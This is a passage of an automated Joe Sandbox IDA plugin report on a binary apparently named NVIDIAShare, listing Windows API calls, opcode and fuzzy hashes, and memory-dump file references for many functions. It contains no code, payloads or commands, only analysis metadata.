                                                            • Opcode ID: 5d65e081cf25b41e507371366736eb8d8435e2e7a38e9bb9386b41592c260de3
                                                            • Instruction ID: 0c719d34694ec5a249f6c3af8ed90ed3625840bd0b588d3d89010c0fb862b74a
                                                            • Opcode Fuzzy Hash: 5d65e081cf25b41e507371366736eb8d8435e2e7a38e9bb9386b41592c260de3
                                                            • Instruction Fuzzy Hash: DAE06572604650EFC7119B59D845B49FBBCFB88E20F00426AE456D7764CB786800CB90
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,0100A23A,?,0100755C,?,?,?,?), ref: 0100A254
                                                              • Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0100A23A,?,0100755C,?,?,?,?), ref: 0100A280
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: d506ce9ef93d1112ca1ea426ab9bc854445ec6cd9fde8a97fff88fbc75015032
                                                            • Instruction ID: 6c71e386091b5bdf15c179c71d1aff966f09c5afab805abd46f3b72d8e2a1d1d
                                                            • Opcode Fuzzy Hash: d506ce9ef93d1112ca1ea426ab9bc854445ec6cd9fde8a97fff88fbc75015032
                                                            • Instruction Fuzzy Hash: C1E092356001289BEB62AB68CC04BD9BB9CAB193E1F0442B1FEC4E71C4DA75DD44CBA0
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0101DEEC
                                                              • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 0101DF03
                                                              • Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
                                                              • Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
                                                              • Part of subcall function 0101B568: IsDialogMessageW.USER32(0001044E,?), ref: 0101B59E
                                                              • Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
                                                              • Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                            • String ID:
                                                            • API String ID: 2718869927-0
                                                            • Opcode ID: 6817d6af9c810c2dc645fae0635eba249954b0896438fb3e609595c05cf60f6d
                                                            • Instruction ID: 1f5f3ccfaf945375bf1b625b4b1d4cacb1a305ed9fc8e4cfaa4704c6759713d9
                                                            • Opcode Fuzzy Hash: 6817d6af9c810c2dc645fae0635eba249954b0896438fb3e609595c05cf60f6d
                                                            • Instruction Fuzzy Hash: DAE022B640024837EF12ABA0DC05FDE3BAC5B14385F040C92B380EA0E2DA3DEA108760
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: b8ff588f83bcefe32b2e8a86c8eb4b863252442056528a764ec3133ff3e6958e
                                                            • Instruction ID: 22e2e2a25e81002e0623cd0a974ceeb2be398cfe2c0ac787b5441860d31de914
                                                            • Opcode Fuzzy Hash: b8ff588f83bcefe32b2e8a86c8eb4b863252442056528a764ec3133ff3e6958e
                                                            • Instruction Fuzzy Hash: 52E048765002186BDB11A694DC44FDABBACFF093D1F0400657AC5D2048D678D6C4CBB0
                                                            APIs
                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0101A3DA
                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0101A3E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            • String ID:
                                                            • API String ID: 1918208029-0
                                                            • Opcode ID: 92cac2a2abdabfba8bf9abd42714168caeda2d99d1355161022609c332502b2c
                                                            • Instruction ID: 23d3827fdd94843ec17865931beb3aa99bafda72f3863520f4b14d8d68d07ee4
                                                            • Opcode Fuzzy Hash: 92cac2a2abdabfba8bf9abd42714168caeda2d99d1355161022609c332502b2c
                                                            • Instruction Fuzzy Hash: EFE0ED71501219EBDB51DF59C5407DEBBE8FB14260F10C05AA88697204E2B8AA04DBA1
                                                            APIs
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01022BAA
                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 01022BB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1660781231-0
                                                            • Opcode ID: 296d687e25b3eac56b7c1eee8460e4bde6a247174686651172ebe20533b67695
                                                            • Instruction ID: e7c785687a0f8a4355ed3da6b01cbf429825379159570fce305615d4bcd914ea
                                                            • Opcode Fuzzy Hash: 296d687e25b3eac56b7c1eee8460e4bde6a247174686651172ebe20533b67695
                                                            • Instruction Fuzzy Hash: 99D02234198332185C6B3EFA38065CD338ABD51B79BE003DEE8E08E8C1EE1990409211
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ItemShowWindow
                                                            • String ID:
                                                            • API String ID: 3351165006-0
                                                            • Opcode ID: 4dea4f6dd8437c3024cf362a5804e837f8c5d63531d52d70e999ee333440ed07
                                                            • Instruction ID: a782aa06b10ed4b03b03cbbc244e87ccace00316b49aae77fcd4b5e3ab742883
                                                            • Opcode Fuzzy Hash: 4dea4f6dd8437c3024cf362a5804e837f8c5d63531d52d70e999ee333440ed07
                                                            • Instruction Fuzzy Hash: 32C0123245C200FECB010BB4DC0AC2BBBB8BBA6312F04C908F0E9C8064C23EC010DB91
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 4f5d66685e822d19c7e8ababc43881871fb682f0d7bd1bec4fb151bea7444e50
                                                            • Instruction ID: fe4d38d393a194c0a53231235e5716946bc7e6383fb83103c02cfbfdec819026
                                                            • Opcode Fuzzy Hash: 4f5d66685e822d19c7e8ababc43881871fb682f0d7bd1bec4fb151bea7444e50
                                                            • Instruction Fuzzy Hash: F6C1AF30A006559BFF66EF68C494BA97BE5AF05310F0801FAED859F2C6DB31D944CB61
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 44de802298231c905d95ad1fbc3fc71e45f273cbe89200b68e0056b8c93e4fc8
                                                            • Instruction ID: 56fb610919c4082d76d3dc5e0a3f029569259108a51299a64f476c77603556db
                                                            • Opcode Fuzzy Hash: 44de802298231c905d95ad1fbc3fc71e45f273cbe89200b68e0056b8c93e4fc8
                                                            • Instruction Fuzzy Hash: 5D71B471540B859EEB27DB74C8549EBB7E9AF24300F40496EE6EB8B2C1DA326584CF11
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 01008289
                                                              • Part of subcall function 010013DC: __EH_prolog.LIBCMT ref: 010013E1
                                                              • Part of subcall function 0100A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$CloseFind
                                                            • String ID:
                                                            • API String ID: 2506663941-0
                                                            • Opcode ID: 6fe45e873539fc8f7c1fe9122511e4b7291e6ff6ba8005cf56c7fcf986602d45
                                                            • Instruction ID: 5f88e9b963bf67398d26c115f1d1c092a74f3649fe068ad1451095828ce5ad8a
                                                            • Opcode Fuzzy Hash: 6fe45e873539fc8f7c1fe9122511e4b7291e6ff6ba8005cf56c7fcf986602d45
                                                            • Instruction Fuzzy Hash: C841D671D446599AEB22DB60CC54AEEB7B8BF54304F0484EBE1CA570D2EB755BC4CB10
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 010013E1
                                                              • Part of subcall function 01005E37: __EH_prolog.LIBCMT ref: 01005E3C
                                                              • Part of subcall function 0100CE40: __EH_prolog.LIBCMT ref: 0100CE45
                                                              • Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 69312da0c5e037cafb32245d82483277a16830d08c1d6f3a501f4c7bd1ff7e09
                                                            • Instruction ID: cec93fc24bb8fee3a2c314a4ccbc9c33a426a5b10bb4467c275949e2cd0074e7
                                                            • Opcode Fuzzy Hash: 69312da0c5e037cafb32245d82483277a16830d08c1d6f3a501f4c7bd1ff7e09
                                                            • Instruction Fuzzy Hash: 3C4147B0905B419EE725DF398884AEBFBE5BF28300F50492ED5FE87281CB726654CB10
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 010013E1
                                                              • Part of subcall function 01005E37: __EH_prolog.LIBCMT ref: 01005E3C
                                                              • Part of subcall function 0100CE40: __EH_prolog.LIBCMT ref: 0100CE45
                                                              • Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 9eb4bcadbec23a800fe2701621e87708881efe2a7862c605bcea76c8e421ee3d
                                                            • Instruction ID: bc2e4b4b238ef7f57742b5714fdac663143d566066f4b237bbba39a9be90b25b
                                                            • Opcode Fuzzy Hash: 9eb4bcadbec23a800fe2701621e87708881efe2a7862c605bcea76c8e421ee3d
                                                            • Instruction Fuzzy Hash: C94158B0905B419EE725DF798884AE7FBE5BF28300F50492ED5FE83281CB766654CB10
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0101B098
                                                              • Part of subcall function 010013DC: __EH_prolog.LIBCMT ref: 010013E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 64724e6e4eed0f4cecf13058b192c8dfd7ac8179458c9ca0bda29a17c0f87f96
                                                            • Instruction ID: 77947289f8eea9fb37141fcc8883db1782b4c376b04e96639b908dc7cd430865
                                                            • Opcode Fuzzy Hash: 64724e6e4eed0f4cecf13058b192c8dfd7ac8179458c9ca0bda29a17c0f87f96
                                                            • Instruction Fuzzy Hash: 2A317E71C0024AAFDF15DF68D8509EEBBB4AF19300F50449ED889B7281D739AE04CB61
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,01033A34), ref: 0102ACF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: fea9311c1bbcc58cf046fc192371e5c0beb6ef37599f657992c8a45585dbf908
                                                            • Instruction ID: cb2e74e7096d96f92e4c3f95ccaa25d403a0aaedb4e00a7de838c3bdcab58bf7
                                                            • Opcode Fuzzy Hash: fea9311c1bbcc58cf046fc192371e5c0beb6ef37599f657992c8a45585dbf908
                                                            • Instruction Fuzzy Hash: B3110A33700639DF9B32AD2CD84099E77D6AB842607264261FDD6EB648DF35DC0187D0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: ff71ff36cac491c89ee3df3b949d6564069a63c60eee0b1886ccce2af47c8448
                                                            • Instruction ID: a5516518c51d1e88399560a690ae40ed458da0b32bbdddd2d6803122b6240b76
                                                            • Opcode Fuzzy Hash: ff71ff36cac491c89ee3df3b949d6564069a63c60eee0b1886ccce2af47c8448
                                                            • Instruction Fuzzy Hash: A301A533900929ABDF13ABA8CD809DEB775BFA8654F014115E996B7191DA34C900C7A0
                                                            APIs
                                                              • Part of subcall function 0102B136: RtlAllocateHeap.NTDLL(00000008,01033A34,00000000,?,0102989A,00000001,00000364,?,?,?,0100D984,?,?,?,00000004,0100D710), ref: 0102B177
                                                            • _free.LIBCMT ref: 0102C4E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction ID: 8542809aa5592354d0549eb23996b790efe3b78644f5571643ab30aa1b88802f
                                                            • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction Fuzzy Hash: 6401DB722003155BF3318E59984596EFBE9FB85270F65055DD5D483281EA30A905C764
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,01033A34,00000000,?,0102989A,00000001,00000364,?,?,?,0100D984,?,?,?,00000004,0100D710), ref: 0102B177
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: cabcb3d475f7f0ca561821c1a000aa4e3ce63e5fffa1e78470a796463ae9a05b
                                                            • Instruction ID: 3734e2a0151760341e89f13a8d2ec74c3a40d283cae5fae9a5574b42db4d069a
